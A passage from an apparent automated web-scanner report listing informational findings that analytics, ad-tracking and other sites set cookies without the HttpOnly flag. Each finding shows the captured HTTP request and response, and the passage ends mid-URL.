18.414. http://smetrics.freecreditreport.com/b/ss/expiglobal,expifcslive/1/H.22.1/s0943075860850  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smetrics.freecreditreport.com
Path:   /b/ss/expiglobal,expifcslive/1/H.22.1/s0943075860850

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/expiglobal,expifcslive/1/H.22.1/s0943075860850?AQB=1&ndh=1&t=24%2F3%2F2011%2014%3A44%3A52%200%20300&ns=experianinteractive&pageName=100323%3Adni%3Adefault.aspx%3Apagetypeid%3Dhomepage21&g=http%3A%2F%2Fwww.freecreditscore.com%2Fdni%2Fdefault.aspx%3FPageTypeID%3DHomePage21%26SiteVersionID%3D932%26SiteID%3D100323%26sc%3D671212%26bcd%3D&ch=100323&server=expiglobal%2Cexpifcslive&v0=671212&events=event1&c1=0&v1=0&c2=932&v2=932&c3=homepage21&v3=homepage21&c5=Prospect&v5=Prospect&c7=dfa29d439e60422e86d8462241524cd1&v7=dfa29d439e60422e86d8462241524cd1&c13=12%3A30PM&v13=12%3A30PM&c14=Sunday&v14=Sunday&c18=First%20Visit&v18=First%20Visit&c21=Paid%20Non-Search&v21=Paid%20Non-Search&c25=671212%3A0&v25=671212%3A0&c26=671212&v26=100323%3Adni%3Adefault.aspx%3Apagetypeid%3Dhomepage21&v29=1303674291453-51326.17&v38=932&v39=Paid%20Non-Search&v40=671212&c49=v%2012-16-2010&c50=http%3A%2F%2Fwww.freecreditscore.com%2Fdni%2Fdefault.aspx%3FPageTypeID%3DHomePage21%26SiteVersionID%3D932%26SiteID%3D100323%26sc%3D671212%26bcd%3D&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&AQE=1 HTTP/1.1
Host: smetrics.freecreditreport.com
Proxy-Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 19:56:01 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA4028851D2234-400001270009D366[CE]; Expires=Fri, 22 Apr 2016 19:56:01 GMT; Domain=.freecreditreport.com; Path=/
Location: http://smetrics.freecreditreport.com/b/ss/expiglobal,expifcslive/1/H.22.1/s0943075860850?AQB=1&pccr=true&vidn=26DA4028851D2234-400001270009D366&&ndh=1&t=24%2F3%2F2011%2014%3A44%3A52%200%20300&ns=experianinteractive&pageName=100323%3Adni%3Adefault.aspx%3Apagetypeid%3Dhomepage21&g=http%3A%2F%2Fwww.freecreditscore.com%2Fdni%2Fdefault.aspx%3FPageTypeID%3DHomePage21%26SiteVersionID%3D932%26SiteID%3D100323%26sc%3D671212%26bcd%3D&ch=100323&server=expiglobal%2Cexpifcslive&v0=671212&events=event1&c1=0&v1=0&c2=932&v2=932&c3=homepage21&v3=homepage21&c5=Prospect&v5=Prospect&c7=dfa29d439e60422e86d8462241524cd1&v7=dfa29d439e60422e86d8462241524cd1&c13=12%3A30PM&v13=12%3A30PM&c14=Sunday&v14=Sunday&c18=First%20Visit&v18=First%20Visit&c21=Paid%20Non-Search&v21=Paid%20Non-Search&c25=671212%3A0&v25=671212%3A0&c26=671212&v26=100323%3Adni%3Adefault.aspx%3Apagetypeid%3Dhomepage21&v29=1303674291453-51326.17&v38=932&v39=Paid%20Non-Search&v40=671212&c49=v%2012-16-2010&c50=http%3A%2F%2Fwww.freecreditscore.com%2Fdni%2Fdefault.aspx%3FPageTypeID%3DHomePage21%26SiteVersionID%3D932%26SiteID%3D100323%26sc%3D671212%26bcd%3D&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&AQE=1
X-C: ms-4.4.1
Expires: Sat, 23 Apr 2011 19:56:01 GMT
Last-Modified: Mon, 25 Apr 2011 19:56:01 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www256
Content-Length: 0
Content-Type: text/plain


18.415. http://srv.amadesa.com/Interaction2/app  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srv.amadesa.com
Path:   /Interaction2/app

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Interaction2/app?proto=0&pid=534&ck=&us=0&en=http%3A//www.myfico.com/Default.aspx&rp=&ppid=6528&slot=amTop&res=r1920x1200&gmt=-5&jsp=RepeatPurchaser%3DFalse&cat=SG9tZXBhZ2U%3D&uid=&rd=8412905228325 HTTP/1.1
Host: srv.amadesa.com
Proxy-Connection: keep-alive
Referer: http://www.myfico.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 01:06:33 GMT
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
P3P: policyref="http://srv.amadesa.com/w3c/p3p.xml" ,CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Cache-Control: max-age=300
Expires: Mon, 25 Apr 2011 01:11:33 GMT
Set-Cookie: amck="8d64ef5ed04973f8dabdaee393ab66f9,1742196*534*05,1,Gd|zg|zj|zd|Jt|zK|JQ|Cj|IV,1,7jdW,6,8C@@c_Homepage]g8,7jds|14x,1,1}@|||@*"; Version=1; Domain=.amadesa.com; Max-Age=157680000; Expires=Sat, 23-Apr-2016 01:06:33 GMT
Content-Length: 1222

if(AmManager.timeOutCall){clearTimeout(AmManager.timeOutCall);}
var amServerTime = {year:2011,month:4,day:24,hour:20,minute:6,second:33,millisecond:413};
AmResponse.set('slotName','amTop');
AmResponse
...[SNIP]...

18.416. http://stats.adbrite.com/stats/stats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.adbrite.com
Path:   /stats/stats.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /stats/stats.gif?_uid=218171&_pid=7013 HTTP/1.1
Host: stats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=5926853162236.512?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKlS0lFKSszLSy3KBKtQqq0FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 25-Apr-2011 20:44:37 GMT
Set-Cookie: cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLU83TSozqDFNLbEyLLQwLkyxMrQyUKoFAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 21-Apr-2021 20:44:37 GMT
Set-Cookie: vsd=0@1@4db48bb5@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Tue, 26-Apr-2011 20:44:37 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 24 Apr 2011 20:44:37 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

18.417. http://stats.adbrite.com/stats/stats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.adbrite.com
Path:   /stats/stats.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /stats/stats.gif?_uid=218171&_pid=7013 HTTP/1.1
Host: stats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=764562517870.2175?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; srh="1%3Aq64FAA%3D%3D"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLU83TSpNqjFNLbEyLLQwLsq0MrIqK6hQqgUA"; ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZFtFlK668asQYmeZlJyrSil2cmpVmmCwRKYo%2Bz%2FwRgf"; vsd=0@2@4db48be1@fls.doubleclick.net

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: image/gif
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 24-Jul-2011 00:56:55 GMT
Set-Cookie: ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZGSa0UpzU5OtUqTyTYLKd11Y9agRE%2BDwRKYo%2Bz%2FwRgf"; path=/; domain=.adbrite.com; expires=Thu, 22-Apr-2021 00:56:55 GMT
Set-Cookie: cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLS8wLc7KqzFNLbEyLLRISy2zMrayNEgvyVaqBQA%3D"; path=/; domain=.adbrite.com; expires=Thu, 22-Apr-2021 00:56:55 GMT
Set-Cookie: vsd=0@1@4db4c6d7@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Wed, 27-Apr-2011 00:56:55 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 25 Apr 2011 00:56:55 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

18.418. http://stats.kroogy.com/cnt-gif1x1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.kroogy.com
Path:   /cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnt-gif1x1.php?e=1920.1200&d=16&r=&p=http%3A//kroogy.com/&t=Kroogy%20Search%20-%20Home HTTP/1.1
Host: stats.kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 12:25:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: cnscc=1303647928; expires=Tue, 24-Apr-2012 23:59:59 GMT; path=/
Location: ./cnt-gif1x1.php?second=1&e=1920.1200&d=16&r=&p=http%3A//kroogy.com/&t=Kroogy%20Search%20-%20Home
Pragma: no-cache
Cache-control: no-cache
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31

<html><body>Moved</body></html>

18.419. http://stats.kroogy.com/cnt-gif1x1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.kroogy.com
Path:   /cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnt-gif1x1.php?second=1&e=1920.1200&d=16&r=&p=http%3A//kroogy.com/&t=Kroogy%20Search%20-%20Home HTTP/1.1
Host: stats.kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943; cnscc=1303647928

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:25:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: cnsuser_id=2425920106; expires=Tue, 24-Apr-2012 23:59:59 GMT; path=/
Pragma: no-cache
Cache-control: no-cache
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

18.420. http://switch.atdmt.com/action/msnus_experian_homepage_091807  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://switch.atdmt.com
Path:   /action/msnus_experian_homepage_091807

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /action/msnus_experian_homepage_091807 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: switch.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 42
Content-Type: image/gif
Content-Location: http://spe.atdmt.com/images/pixel.gif
Expires: 0
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001303692767-3995853; expires=Wednesday, 24-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: MUID=26DB680E69D6439A95B060D5EC15A682; expires=Friday, 11-Nov-2011 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Mon, 25 Apr 2011 00:52:46 GMT
Connection: close

GIF89a.............!.......,...........2.;

18.421. http://technet.microsoft.com/edge/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technet.microsoft.com
Path:   /edge/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /edge/ HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR=0=/:1=en-us:2=en-us/security; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; ixpLightBrowser=0; s_nr=1303567265614-New; _opt_vi_DANG4OLL=2A807526-0B45-4F67-8001-CE6244FF15CF; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/23/2011 14:01:21&Microsoft.VisitStartDate=04/23/2011 13:49:08&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; ADS=SN=175A21EF; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303649859266:ss=1303649859266; WT_NVR_RU=0=technet|msdn:1=:2=; Sto.UserLocale=en-us

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /en-us/edge/
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:49 GMT
Content-Length: 129

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/en-us/edge/">here</a>.</h2>
</body></html>

18.422. http://track3.mybloglog.com/js/jsserv.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track3.mybloglog.com
Path:   /js/jsserv.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/jsserv.php?mblID=2008013116011951 HTTP/1.1
Host: track3.mybloglog.com
Proxy-Connection: keep-alive
Referer: http://reputation-watch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:33:38 GMT
Set-Cookie: BX=a84as5l6r9gb2&b=3&s=l5; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.mybloglog.com
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" policyref="http://www.mybloglog.com/w3c/p3p.xml"
Expires: Sun, 01 May 2011 00:00:00 GMT
Set-Cookie: mbl_sid=N2011042417333800; expires=Tue, 24-Apr-2012 00:33:38 GMT; path=/; domain=.mybloglog.com
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6761


<!--
var mbl_recent_visitor='';
var mbl_current_visitor='';
if(typeof(mbl_jsserv_loaded)=='undefined'){var mbl_jsserv_loaded=true;function m_r_e(obj,w,f){if(window.addEventListener){obj.addEventListe
...[SNIP]...

18.423. http://translate.googleapis.com/translate_a/t  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/t

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://sensic.net/
Origin: http://sensic.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 1270

q=%3Ca%20i%3D0%3EDE%3C%2Fa%3E%3Ca%20i%3D1%3E%7C%3C%2Fa%3E%3Ca%20i%3D2%3EEN%3C%2Fa%3E&q=Informationen%20zum%20Datenschutz&q=%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20Datenschutzerkl%C3%A4rung%0A%20%
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:34:20 GMT
Expires: Sun, 24 Apr 2011 20:34:20 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=a5d89c5edf6be71a:TM=1303677260:LM=1303677260:S=s89aXvHHpLVDT0L2; expires=Tue, 23-Apr-2013 20:34:20 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 984

["\x3ca i=0\x3eDE\x3c/a\x3e \x3ca i=1\x3e|\x3c/a\x3e \x3ca i=2\x3eEN\x3c/a\x3e","Privacy Policy","\n Privacy Policy\n ","\n \x3ci\x3eVerantwortlich f..r die Erhebu
...[SNIP]...

18.424. http://transunioninteractive.122.2o7.net/b/ss/tuitruecredit/1/H.22.1/s23772791333030  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://transunioninteractive.122.2o7.net
Path:   /b/ss/tuitruecredit/1/H.22.1/s23772791333030

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/tuitruecredit/1/H.22.1/s23772791333030?AQB=1&ndh=1&t=24%2F3%2F2011%2019%3A34%3A36%200%20300&ns=transunioninteractive&pageName=tc%3ALanding%20Page%20%3A%20TrueCredit%20Entry&g=http%3A%2F%2Fwww.truecredit.com%2F&cc=USD&vvp=DFA%231516717%3Av25%3D%5B%5B%22DFA%3A%22%2Blis%2B%22%3A%22%2Blip%2B%22%3A%22%2Blastimp%2B%22%3A%22%2Blastimptime%2B%22%3A%22%2Blcs%2B%22%3A%22%2Blcp%2B%22%3A%22%2Blastclk%2B%22%3A%22%2Blastclktime%5D%5D&ch=tc%3ALanding%20Page&server=Mg8tjYz9TK%2BcbMDBE7I1OQ%3D%3D&v0=%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C&events=event18%2Cevent19&v1=%2B1&h1=Landing%20Page&h2=tc%7CLanding%20Page&c4=Repeat&v4=Repeat&c5=3&v5=3&c6=7%3A30PM&v6=7%3A30PM&c7=Sunday&v7=Sunday&c8=Weekend&v8=Weekend&c10=17%3A34%3A18&c11=173.193.214.243&c21=out&v22=%7C%7C%7C%7C%7Ccredit%7C%7C%7C%7C%7C%3E%7C%7C%7C%7C%7Ccredit%7C%7C%7C%7C%7C%3E%7C%7C%7C%7C%7Ccredit%7C%7C%7C%7C%7C%3E%7C%7C%7C%7C%7Ccredit%7C%7C%7C%7C%7C%3E%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C&c29=Less%20than%201%20day&v29=Less%20than%201%20day&c34=D%3Dv34&v34=http%3A%2F%2Fwww.truecredit.com%2F&c35=tc&v35=D%3Dc35&c47=1&c52=D%3Ds_vi&v52=D%3Ds_vi&c53=D%3Dv53&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: transunioninteractive.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 00:49:43 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DA6293851D2C2D-40000109C00B07F0[CE]; Expires=Sat, 23 Apr 2016 00:49:43 GMT; Domain=transunioninteractive.122.2o7.net; Path=/
Location: http://transunioninteractive.122.2o7.net/b/ss/tuitruecredit/1/H.22.1/s23772791333030?AQB=1&pccr=true&vidn=26DA6293851D2C2D-40000109C00B07F0&&ndh=1&t=24%2F3%2F2011%2019%3A34%3A36%200%20300&ns=transunioninteractive&pageName=tc%3ALanding%20Page%20%3A%20TrueCredit%20Entry&g=http%3A%2F%2Fwww.truecredit.com%2F&cc=USD&vvp=DFA%231516717%3Av25%3D%5B%5B%22DFA%3A%22%2Blis%2B%22%3A%22%2Blip%2B%22%3A%22%2Blastimp%2B%22%3A%22%2Blastimptime%2B%22%3A%22%2Blcs%2B%22%3A%22%2Blcp%2B%22%3A%22%2Blastclk%2B%22%3A%22%2Blastclktime%5D%5D&ch=tc%3ALanding%20Page&server=Mg8tjYz9TK%2BcbMDBE7I1OQ%3D%3D&v0=%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C&events=event18%2Cevent19&v1=%2B1&h1=Landing%20Page&h2=tc%7CLanding%20Page&c4=Repeat&v4=Repeat&c5=3&v5=3&c6=7%3A30PM&v6=7%3A30PM&c7=Sunday&v7=Sunday&c8=Weekend&v8=Weekend&c10=17%3A34%3A18&c11=173.193.214.243&c21=out&v22=%7C%7C%7C%7C%7Ccredit%7C%7C%7C%7C%7C%3E%7C%7C%7C%7C%7Ccredit%7C%7C%7C%7C%7C%3E%7C%7C%7C%7C%7Ccredit%7C%7C%7C%7C%7C%3E%7C%7C%7C%7C%7Ccredit%7C%7C%